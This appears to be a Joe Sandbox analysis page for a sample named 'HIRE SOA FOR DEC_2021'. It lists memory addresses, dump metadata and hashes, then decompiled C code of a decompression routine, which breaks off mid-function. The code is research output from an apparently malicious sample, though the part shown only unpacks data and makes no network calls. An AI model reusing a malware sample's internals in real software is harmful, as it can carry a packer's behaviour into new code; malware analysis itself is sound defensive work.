0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x00000000
0x004060d9
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x00000000
0x00000000
0x00406355
0x00406359
0x0040637c
0x0040637f
0x00406382
0x0040638c
0x0040635b
0x0040635b
0x0040635e
0x00406361
0x00406364
0x00406371
0x00406374
0x00406374
0x00000000
0x00000000
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x00000000
0x00406424
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00000000
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x00000000
0x004066b5
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00000000
0x00406828
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x00000000
0x0040667d
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction ID: 22847fb14cdf7a24f95a3c84300c4786f150dfac54d3f328c430af40b2e48c23
Opcode Fuzzy Hash: 15aa086d42ea43156f7fbf6fbf97274f99b2efc4d47cfe7aa8cc3aef762d7e26
Instruction Fuzzy Hash: EB816871D04229CFDF24CFA8C844BAEBBB1FB44305F25816AD406BB281C7789A86DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00405E9D Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00405E9D(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004068EF))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
